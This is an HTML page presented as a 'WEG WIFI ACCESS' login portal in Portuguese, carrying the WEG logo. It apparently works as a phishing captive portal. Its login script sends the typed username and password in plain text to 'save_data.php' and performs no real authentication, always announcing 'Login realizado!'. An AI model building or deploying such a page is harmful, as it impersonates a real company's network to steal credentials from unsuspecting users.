<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>WEG WIFI ACCESS</title>
  <style>
    
    body {
    font-family: 'Montserrat'; font-size: 12px;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
      background-color: #f4f4f4;
    }

    .container {
      background-color: #fff;
      padding: 50px;
      border-radius: 50px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
      text-align: center;
    }

    .logo {
      width: 100px;
      height: 100px;
      margin-bottom: 20px;
      margin: 20px auto; /* adicionado */
      display: block; /* adicionado */
      
    }

    .conecte-se {
        font-size: 14px;
    }

    .logo img {
      width: 100%;
      height: auto;
      border-radius: 4px;
    }

    input[type="text"], input[type="password"] {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ddd;
      border-radius: 4px;
    }

    button {
      background-color: hsla(224, 93%, 44%, 0.788);
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }

    button:hover {
      background-color: #000000;
    }

    .footer {
      margin-top: 20px;
      font-size: 12px;
      color: #777;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="Weg_logo_blue_vector1.png" alt="WEG Logo">
    </div>
    <h1>WEG WIFI ACCESS</h1>
    <p class="conecte-se">conecte-se para continuar</p>

    <input type="text" placeholder="usuario" id="username">
    <input type="password" placeholder="senha" id="password">

    <button type="button" onclick="login()">Entrar</button>
  </div>

  <div class="footer">
    WEG 2024
  </div>

  <script>
    function login() {
      var username = document.getElementById("username").value;
      var password = document.getElementById("password").value;

      var xhr = new XMLHttpRequest();
      xhr.open("POST", "save_data.php", true);
      xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      xhr.send("username=" + username + "&password=" + password);

      alert('Login realizado!');
    }
  </script>
  
</body>
</html>
